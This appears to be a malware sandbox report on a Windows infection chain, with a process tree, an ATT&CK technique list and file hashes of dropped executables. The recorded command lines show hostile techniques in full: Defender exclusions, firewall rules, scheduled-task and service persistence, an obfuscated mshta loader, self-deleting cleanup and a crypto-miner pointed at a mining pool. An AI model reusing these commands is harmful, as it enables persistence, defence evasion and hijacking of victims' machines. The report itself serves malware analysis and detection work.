"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
3⤵
PID:4392

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
3⤵
PID:2596

C:\Windows\SYSTEM32\schtasks.exe
schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
3⤵
- Creates scheduled task(s)
PID:5776

C:\Windows\System\svchost.exe
"C:\Windows\System\svchost.exe" formal
3⤵
PID:5832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
4⤵
PID:4188

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
4⤵
PID:3744

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
4⤵
PID:4028

C:\Users\Admin\Documents\9xiwBu1hve2uYmiUM8sWumJo.exe
"C:\Users\Admin\Documents\9xiwBu1hve2uYmiUM8sWumJo.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2124

C:\Users\Admin\Documents\kdSRwVNcQGlBHuC6yHaVd4RP.exe
"C:\Users\Admin\Documents\kdSRwVNcQGlBHuC6yHaVd4RP.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1952

C:\Program Files (x86)\Company\NewProduct\cutm3.exe
"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
3⤵
- Executes dropped EXE
PID:3140

C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3752

C:\Program Files (x86)\Company\NewProduct\inst3.exe
"C:\Program Files (x86)\Company\NewProduct\inst3.exe"
3⤵
- Executes dropped EXE
PID:1696

C:\Users\Admin\Documents\eLMtdjybMjVt9OmuDLYyxaBx.exe
"C:\Users\Admin\Documents\eLMtdjybMjVt9OmuDLYyxaBx.exe"
2⤵
- Executes dropped EXE
PID:1700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 660
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 680
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 684
3⤵
- Program crash
PID:4348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 676
3⤵
- Program crash
PID:4604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 852
3⤵
- Program crash
PID:5600

C:\Users\Admin\Documents\zFUZaxEbR2NXdHS9pZoPfmJ1.exe
"C:\Users\Admin\Documents\zFUZaxEbR2NXdHS9pZoPfmJ1.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1416

C:\Users\Admin\Documents\kwsBrEgQEpPK2P_t3egylt6Y.exe
"C:\Users\Admin\Documents\kwsBrEgQEpPK2P_t3egylt6Y.exe"
2⤵
PID:5128

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Executes dropped EXE
PID:1232

C:\Users\Admin\AppData\Local\Temp\F4B3.exe
C:\Users\Admin\AppData\Local\Temp\F4B3.exe
1⤵
PID:5560

C:\Users\Admin\AppData\Local\Temp\F4B3.exe
C:\Users\Admin\AppData\Local\Temp\F4B3.exe
2⤵
PID:4176

C:\Users\Admin\AppData\Local\Temp\E37.exe
C:\Users\Admin\AppData\Local\Temp\E37.exe
1⤵
PID:4332

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\biakoado\
2⤵
PID:5128

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\gmhktccx.exe" C:\Windows\SysWOW64\biakoado\
2⤵
PID:5132

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create biakoado binPath= "C:\Windows\SysWOW64\biakoado\gmhktccx.exe /d\"C:\Users\Admin\AppData\Local\Temp\E37.exe\"" type= own start= auto DisplayName= "wifi support"
2⤵
PID:2308

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description biakoado "wifi internet conection"
2⤵
PID:4028

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start biakoado
2⤵
PID:1208

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
2⤵
PID:4388

C:\Users\Admin\AppData\Local\Temp\1CCE.exe
C:\Users\Admin\AppData\Local\Temp\1CCE.exe
1⤵
PID:5000

C:\Users\Admin\AppData\Local\Temp\1bdccf37-e812-46d1-8f9b-15180edb0c7e\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\1bdccf37-e812-46d1-8f9b-15180edb0c7e\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\1bdccf37-e812-46d1-8f9b-15180edb0c7e\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
2⤵
PID:4612

C:\Users\Admin\AppData\Local\Temp\1bdccf37-e812-46d1-8f9b-15180edb0c7e\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\1bdccf37-e812-46d1-8f9b-15180edb0c7e\AdvancedRun.exe" /SpecialRun 4101d8 4612
3⤵
PID:4864

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1CCE.exe" -Force
2⤵
PID:996

C:\Users\Admin\AppData\Local\Temp\1CCE.exe
C:\Users\Admin\AppData\Local\Temp\1CCE.exe
2⤵
PID:3096

C:\Users\Admin\AppData\Local\Temp\2C6F.exe
C:\Users\Admin\AppData\Local\Temp\2C6F.exe
1⤵
PID:5604

C:\Users\Admin\AppData\Local\Temp\4A78.exe
C:\Users\Admin\AppData\Local\Temp\4A78.exe
1⤵
PID:4448

C:\Windows\SysWOW64\biakoado\gmhktccx.exe
C:\Windows\SysWOW64\biakoado\gmhktccx.exe /d"C:\Users\Admin\AppData\Local\Temp\E37.exe"
1⤵
PID:5648

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
PID:6124

C:\Windows\SysWOW64\svchost.exe
svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
3⤵
PID:2240

C:\Users\Admin\AppData\Local\Temp\5537.exe
C:\Users\Admin\AppData\Local\Temp\5537.exe
1⤵
PID:1444

C:\Users\Admin\AppData\Local\Temp\6044.exe
C:\Users\Admin\AppData\Local\Temp\6044.exe
1⤵
PID:744

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 6044.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\6044.exe" & del C:\ProgramData\*.dll & exit
2⤵
PID:6488

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 6044.exe /f
3⤵
- Kills process with taskkill
PID:6872

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
3⤵
- Delays execution with timeout.exe
PID:5528

C:\Users\Admin\AppData\Local\Temp\6873.exe
C:\Users\Admin\AppData\Local\Temp\6873.exe
1⤵
PID:3592

C:\Users\Admin\AppData\Local\Temp\ab59522a-e290-43ea-bb7a-239d81ac2818\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\ab59522a-e290-43ea-bb7a-239d81ac2818\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\ab59522a-e290-43ea-bb7a-239d81ac2818\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
2⤵
PID:5132

C:\Users\Admin\AppData\Local\Temp\ab59522a-e290-43ea-bb7a-239d81ac2818\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\ab59522a-e290-43ea-bb7a-239d81ac2818\AdvancedRun.exe" /SpecialRun 4101d8 5132
3⤵
PID:5036

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\6873.exe" -Force
2⤵
PID:5900

C:\Users\Admin\AppData\Local\Temp\6873.exe
C:\Users\Admin\AppData\Local\Temp\6873.exe
2⤵
PID:5132

C:\Users\Admin\AppData\Local\Temp\9FD0.exe
C:\Users\Admin\AppData\Local\Temp\9FD0.exe
1⤵
PID:2260

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
"C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"
2⤵
PID:6304

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\
3⤵
PID:6476

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\
4⤵
PID:6864

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F
3⤵
- Creates scheduled task(s)
PID:6508

C:\Users\Admin\AppData\Local\Temp\C23D.exe
C:\Users\Admin\AppData\Local\Temp\C23D.exe
1⤵
PID:6736

C:\Users\Admin\AppData\Local\Temp\445F.exe
C:\Users\Admin\AppData\Local\Temp\445F.exe
1⤵
PID:1676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
2⤵
PID:4912

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1qg1lz2h\1qg1lz2h.cmdline"
3⤵
PID:6716

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES497B.tmp" "c:\Users\Admin\AppData\Local\Temp\1qg1lz2h\CSCFD4E04DFB7384BF1A23CBF476B74E37.TMP"
4⤵
PID:6156

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
PID:4836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
PID:4780

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:6836

C:\Users\Admin\AppData\Local\Temp\B2E8.exe
C:\Users\Admin\AppData\Local\Temp\B2E8.exe
1⤵
PID:7164

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
2⤵
PID:5704

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cydegnoq\cydegnoq.cmdline"
3⤵
PID:6576

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4C98.tmp" "c:\Users\Admin\AppData\Local\Temp\cydegnoq\CSCC2EC35C3DADE433C9474CA0B441CB36.TMP"
4⤵
PID:3852

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
PID:1768

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
PID:1888

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5560

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4416

C:\Users\Admin\AppData\Local\Temp\EA55.exe
C:\Users\Admin\AppData\Local\Temp\EA55.exe
1⤵
PID:2956

C:\Users\Admin\AppData\Local\Temp\EA55.exe
C:\Users\Admin\AppData\Local\Temp\EA55.exe
2⤵
PID:2644

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\60af04a8-085f-431b-8b85-8f1e1faf6258" /deny *S-1-1-0:(OI)(CI)(DE,DC)
3⤵
- Modifies file permissions
PID:6500

C:\Users\Admin\AppData\Local\Temp\EA55.exe
"C:\Users\Admin\AppData\Local\Temp\EA55.exe" --Admin IsNotAutoStart IsNotTask
3⤵
PID:6256

C:\Users\Admin\AppData\Local\Temp\EA55.exe
"C:\Users\Admin\AppData\Local\Temp\EA55.exe" --Admin IsNotAutoStart IsNotTask
4⤵
PID:6168

C:\Users\Admin\AppData\Local\b41ead00-e232-4b11-9785-6293931d4e9b\build2.exe
"C:\Users\Admin\AppData\Local\b41ead00-e232-4b11-9785-6293931d4e9b\build2.exe"
5⤵
PID:344

C:\Users\Admin\AppData\Local\b41ead00-e232-4b11-9785-6293931d4e9b\build2.exe
"C:\Users\Admin\AppData\Local\b41ead00-e232-4b11-9785-6293931d4e9b\build2.exe"
6⤵
PID:4924

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\b41ead00-e232-4b11-9785-6293931d4e9b\build2.exe" & del C:\ProgramData\*.dll & exit
7⤵
PID:6380

C:\Windows\SysWOW64\taskkill.exe
taskkill /im build2.exe /f
8⤵
- Kills process with taskkill
PID:568

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Delays execution with timeout.exe
PID:6868

C:\Users\Admin\AppData\Local\b41ead00-e232-4b11-9785-6293931d4e9b\build3.exe
"C:\Users\Admin\AppData\Local\b41ead00-e232-4b11-9785-6293931d4e9b\build3.exe"
5⤵
PID:6492

C:\Users\Admin\AppData\Local\b41ead00-e232-4b11-9785-6293931d4e9b\build3.exe
"C:\Users\Admin\AppData\Local\b41ead00-e232-4b11-9785-6293931d4e9b\build3.exe"
6⤵
PID:5072

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
7⤵
- Creates scheduled task(s)
PID:6716

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6672

C:\Users\Admin\AppData\Local\Temp\ED44.exe
C:\Users\Admin\AppData\Local\Temp\ED44.exe
1⤵
PID:5812

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im ED44.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\ED44.exe" & del C:\ProgramData\*.dll & exit
2⤵
PID:4836

C:\Windows\SysWOW64\taskkill.exe
taskkill /im ED44.exe /f
3⤵
- Kills process with taskkill
PID:1528

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
3⤵
- Delays execution with timeout.exe
PID:5884

C:\Users\Admin\AppData\Local\Temp\F0B0.exe
C:\Users\Admin\AppData\Local\Temp\F0B0.exe
1⤵
PID:7148

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscrIPT: closE (creatEObJECt( "wScriPT.sheLL"). RUn ("cmd.Exe /R Copy /Y ""C:\Users\Admin\AppData\Local\Temp\F0B0.exe"" ..\Om9J.EXe&& sTart ..\om9J.eXe -Pc67MmdeJEwd3RQc3YgkzNP5MZN & iF """" == """" for %n In ( ""C:\Users\Admin\AppData\Local\Temp\F0B0.exe"" ) do taskkill -f -Im ""%~Nxn"" " , 0, tRUE ) )
2⤵
PID:2672

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R Copy /Y "C:\Users\Admin\AppData\Local\Temp\F0B0.exe" ..\Om9J.EXe&& sTart ..\om9J.eXe -Pc67MmdeJEwd3RQc3YgkzNP5MZN &iF ""== "" for %n In ( "C:\Users\Admin\AppData\Local\Temp\F0B0.exe") do taskkill -f -Im "%~Nxn"
3⤵
PID:6636

C:\Users\Admin\AppData\Local\Temp\Om9J.EXe
..\om9J.eXe -Pc67MmdeJEwd3RQc3YgkzNP5MZN
4⤵
PID:6380

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscrIPT: closE (creatEObJECt( "wScriPT.sheLL"). RUn ("cmd.Exe /R Copy /Y ""C:\Users\Admin\AppData\Local\Temp\Om9J.EXe"" ..\Om9J.EXe&& sTart ..\om9J.eXe -Pc67MmdeJEwd3RQc3YgkzNP5MZN & iF ""-Pc67MmdeJEwd3RQc3YgkzNP5MZN "" == """" for %n In ( ""C:\Users\Admin\AppData\Local\Temp\Om9J.EXe"" ) do taskkill -f -Im ""%~Nxn"" " , 0, tRUE ) )
5⤵
PID:6740

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R Copy /Y "C:\Users\Admin\AppData\Local\Temp\Om9J.EXe" ..\Om9J.EXe&& sTart ..\om9J.eXe -Pc67MmdeJEwd3RQc3YgkzNP5MZN &iF "-Pc67MmdeJEwd3RQc3YgkzNP5MZN "== "" for %n In ( "C:\Users\Admin\AppData\Local\Temp\Om9J.EXe") do taskkill -f -Im "%~Nxn"
6⤵
PID:4216

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBsCRipT: CloSe (CreAteOBJECT( "wScrIPt.sHelL" ). Run ( "cMd.exe /R ECHo | set /P = ""MZ"" > Qu39U.QP & CoPY /y /B qU39U.QP +D~QKAh.P2 + M1PBRoiT.Oq ..\2S7X.J0p & stArT msiexec /Y ..\2S7X.J0P & deL /q * " , 0, TRue ))
5⤵
PID:6596

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R ECHo | set /P = "MZ" > Qu39U.QP & CoPY /y /B qU39U.QP +D~QKAh.P2 + M1PBRoiT.Oq ..\2S7X.J0p & stArT msiexec /Y ..\2S7X.J0P &deL /q *
6⤵
PID:6472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHo "
7⤵
PID:6564

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>Qu39U.QP"
7⤵
PID:6532

C:\Windows\SysWOW64\msiexec.exe
msiexec /Y ..\2S7X.J0P
7⤵
PID:5548

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -Im "F0B0.exe"
4⤵
- Kills process with taskkill
PID:5048

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:1912

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:4888

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

File Permissions Modification

T1222

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
MD5
17f6f3213a5a5d2fb1ef8793081c5ddd

SHA1
4601bd223fd7c52b12bc186ec9a0eb94167aaebb

SHA256
6987f229daf0e954b67d5dbf779150b3b5c8dc3e69f66fe7c41f875be7725994

SHA512
b640e80f1aec1302ad95f88b3fa10d16df39f9ecf498eadcd602bbd945550c8843393ef6176a2fc3120cf3db487edd400f3a633ef944faae5abcef67637d7276

Download Submit
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
MD5
17f6f3213a5a5d2fb1ef8793081c5ddd

SHA1
4601bd223fd7c52b12bc186ec9a0eb94167aaebb

SHA256
6987f229daf0e954b67d5dbf779150b3b5c8dc3e69f66fe7c41f875be7725994

SHA512
b640e80f1aec1302ad95f88b3fa10d16df39f9ecf498eadcd602bbd945550c8843393ef6176a2fc3120cf3db487edd400f3a633ef944faae5abcef67637d7276

Download Submit
C:\Program Files (x86)\Company\NewProduct\cutm3.exe
MD5
07e143efd03815a3b8c8b90e7e5776f0

SHA1
077314efef70cef8f43eeba7f1b8ba0e5e5dedc9

SHA256
32967e652530e7ac72841886cb07badcced11e1e725e2e85e1ee8046c4fe2149

SHA512
79ed77bbcac3f84d846b4b02e1a50a197d857d4b1d6abd84a45393bb3c262768ab6f3952733a1ae6010978ab598842d9b7ac4be5a5b23c374a3d4796c87a38d6

Download Submit
C:\Program Files (x86)\Company\NewProduct\cutm3.exe
MD5
07e143efd03815a3b8c8b90e7e5776f0

SHA1
077314efef70cef8f43eeba7f1b8ba0e5e5dedc9

SHA256
32967e652530e7ac72841886cb07badcced11e1e725e2e85e1ee8046c4fe2149

SHA512
79ed77bbcac3f84d846b4b02e1a50a197d857d4b1d6abd84a45393bb3c262768ab6f3952733a1ae6010978ab598842d9b7ac4be5a5b23c374a3d4796c87a38d6

Download Submit
C:\Program Files (x86)\Company\NewProduct\inst3.exe
MD5
a41adbdafc72a86a7a74c494659954b4

SHA1
d43696a0e3704a141fc0cf6a1098525c00ce882f

SHA256
d6d48be25063b05a78a013810ef21ed4a64a2122f91fadcbaf609dee8cce6f7e

SHA512
44a1bd50cf1bed0ef1adaf7839ae8549c752b9825f542daa51730019f8f3186af0c12621789668e8a083625b90680d804d8a7a7de8f46da2df5cb7550afd45d2

Download Submit
C:\Program Files (x86)\Company\NewProduct\inst3.exe
MD5
a41adbdafc72a86a7a74c494659954b4

SHA1
d43696a0e3704a141fc0cf6a1098525c00ce882f

SHA256
d6d48be25063b05a78a013810ef21ed4a64a2122f91fadcbaf609dee8cce6f7e

SHA512
44a1bd50cf1bed0ef1adaf7839ae8549c752b9825f542daa51730019f8f3186af0c12621789668e8a083625b90680d804d8a7a7de8f46da2df5cb7550afd45d2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
MD5
6aab29bcad03e62b98ecc27ddccbd2fb

SHA1
9789e834d1032e2d0e50786b2726ad3b76b2989e

SHA256
0c272b9332d24a3133e046b43557797f667de89846227ca017a035f3afe74d33

SHA512
25ada4f802b9aab701ce86f5d642a3a486fed4fe7a6f360e87de1d96031ec8ee349428fb1b7ece75c209a5b56006483003582d469b5a0982269c011f09d52455

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
45f31785245cde8c22dfcd607a624ffe

SHA1
2c88dd5bdbe47fa763cdd23505a72d8e8f19b7b0

SHA256
30a3735c5072dd2dfaa59aebdff9c3a720f32a4ff0415ad44a73b83fd707307d

SHA512
8e6aebb3e74b5cd05da04d656bccd91e283584b4162b2c569a5522a8a28ea10cfed298b59f6085231c6819b4d2dfb2cab02226a92e557c2f7254bb4546f44787

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
MD5
4684c0ea1d86e4c4a50169e06fc8ddd9

SHA1
012519b6668867ffb02ae301f8b496e454da227c

SHA256
ca04b26b2b143250459227332fedb09f8e425a5de48876fd9d4a786b7963c292

SHA512
5862fbebc4dbc78bf1cb24549271df108637d2ea54be8194f90570e7c9f46faf945dd6d2f1e922ffebb8c9ecd8aac68b7180cb1078cb6fd339804213b7999e12

Download Submit
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
MD5
04571dd226f182ab814881b6eaaf8b00

SHA1
9bbb1cefd052ae602354f3f4b5a2484f31b06f37

SHA256
3a77893efb476ec95d3e340cf5b98f1bf39c77a4064be7c39475ef9ebd3aed1c

SHA512
4dba92ebc85d5553a11b749fa8147f233c1ab7cd04256d3fd1fed17126cc338a93fa64f1ec807d3eb75f6958a5555c8f9078c0b8ed7c090278a03e7fbe06eb06

Download Submit
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
MD5
04571dd226f182ab814881b6eaaf8b00

SHA1
9bbb1cefd052ae602354f3f4b5a2484f31b06f37

SHA256
3a77893efb476ec95d3e340cf5b98f1bf39c77a4064be7c39475ef9ebd3aed1c

SHA512
4dba92ebc85d5553a11b749fa8147f233c1ab7cd04256d3fd1fed17126cc338a93fa64f1ec807d3eb75f6958a5555c8f9078c0b8ed7c090278a03e7fbe06eb06

Download Submit
C:\Users\Admin\AppData\Roaming\1501216.exe
MD5
d5f2744d3903f8dcaf44af67e45d6305

SHA1
44624337395c3e602eb6221a5dc96474e6d9cb4f

SHA256
a75eba0474602d86a097d601ef89418f7ae3171bca6ee79bb467d4208b73affc

SHA512
d7ca5237560396acec27869d57caabb8183cffe31288a94227430d9519118e2fa4ef3745a6c027cbb3364a1599929b97431fa82b63ff81ecf6a9b0f89a266b0b

Download Submit
C:\Users\Admin\AppData\Roaming\1501216.exe
MD5
d5f2744d3903f8dcaf44af67e45d6305

SHA1
44624337395c3e602eb6221a5dc96474e6d9cb4f

SHA256
a75eba0474602d86a097d601ef89418f7ae3171bca6ee79bb467d4208b73affc

SHA512
d7ca5237560396acec27869d57caabb8183cffe31288a94227430d9519118e2fa4ef3745a6c027cbb3364a1599929b97431fa82b63ff81ecf6a9b0f89a266b0b

Download Submit
C:\Users\Admin\AppData\Roaming\2883812.exe
MD5
44818f649522374647bf1cfe903ad7ce

SHA1
f19c3211a12f13c411e1d09d8dba6b5534ab08f9

SHA256
25d881a3f9f6ae877ce6caee8b862611496ab11f25fe4084895c8ef427012262

SHA512
d740e33d4eeefe30937dfb4d769679e1edd325f5d22ee70a68386b78ca489f31813acc8f6f39123baca0f737fcd76774613b98b915d550f3a0ee200c1a5dad90

Download Submit
C:\Users\Admin\AppData\Roaming\3698175.exe
MD5
36e5129027bbe442eafb2c04c9729cf8

SHA1
078c4e33edca732c46fcdccca875e90a82ebdcd8

SHA256
69176bbbc8641df0d07169626908f25ccd2fc502cf8c06b7aadfdd90eb138f60

SHA512
